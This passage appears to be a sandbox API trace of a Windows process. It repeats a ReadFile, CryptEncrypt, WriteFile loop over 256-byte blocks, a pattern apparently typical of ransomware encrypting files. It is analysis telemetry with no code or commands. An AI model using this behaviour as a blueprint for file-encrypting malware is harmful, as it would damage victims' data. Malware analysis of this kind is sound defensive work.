lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.225] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.225] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.225] GetLastError () returned 0x0 [0167.225] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.225] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.225] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.225] GetLastError () returned 0x0 [0167.225] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.225] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.225] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.225] GetLastError () returned 0x0 [0167.225] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.225] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.225] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.225] GetLastError () returned 0x0 [0167.225] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.225] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.226] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.226] GetLastError () returned 0x0 [0167.226] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.226] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.226] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.226] GetLastError () returned 0x0 [0167.226] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.226] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.226] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.226] GetLastError () returned 0x0 [0167.226] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.226] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.226] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.226] GetLastError () returned 0x0 [0167.226] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.226] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.226] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.226] GetLastError () returned 0x0 [0167.226] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.226] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.226] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.226] GetLastError () returned 0x0 [0167.226] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.226] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.226] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.226] GetLastError () returned 0x0 [0167.226] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.227] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.227] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.227] GetLastError () returned 0x0 [0167.227] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.227] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.236] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.236] GetLastError () returned 0x0 [0167.236] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.236] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.236] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.236] GetLastError () returned 0x0 [0167.236] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.236] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.237] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.237] GetLastError () returned 0x0 [0167.237] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.237] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.237] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.237] GetLastError () returned 0x0 [0167.237] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.237] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.237] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.237] GetLastError () returned 0x0 [0167.237] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.237] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.237] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.237] GetLastError () returned 0x0 [0167.237] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.237] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.237] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.237] GetLastError () returned 0x0 [0167.237] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.237] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.237] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.237] GetLastError () returned 0x0 [0167.237] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.237] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.237] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.237] GetLastError () returned 0x0 [0167.237] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.237] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.238] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.238] GetLastError () returned 0x0 [0167.238] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.238] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.238] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.238] GetLastError () returned 0x0 [0167.238] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.238] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.238] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.238] GetLastError () returned 0x0 [0167.238] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.238] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.238] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.238] GetLastError () returned 0x0 [0167.238] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.238] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.238] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.238] GetLastError () returned 0x0 [0167.238] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.238] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.238] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.238] GetLastError () returned 0x0 [0167.238] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.238] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.239] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.239] GetLastError () returned 0x0 [0167.239] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.239] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.239] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.239] GetLastError () returned 0x0 [0167.239] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.239] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.239] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.239] GetLastError () returned 0x0 [0167.239] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.239] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.239] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.239] GetLastError () returned 0x0 [0167.239] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.239] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.239] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.239] GetLastError () returned 0x0 [0167.239] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, 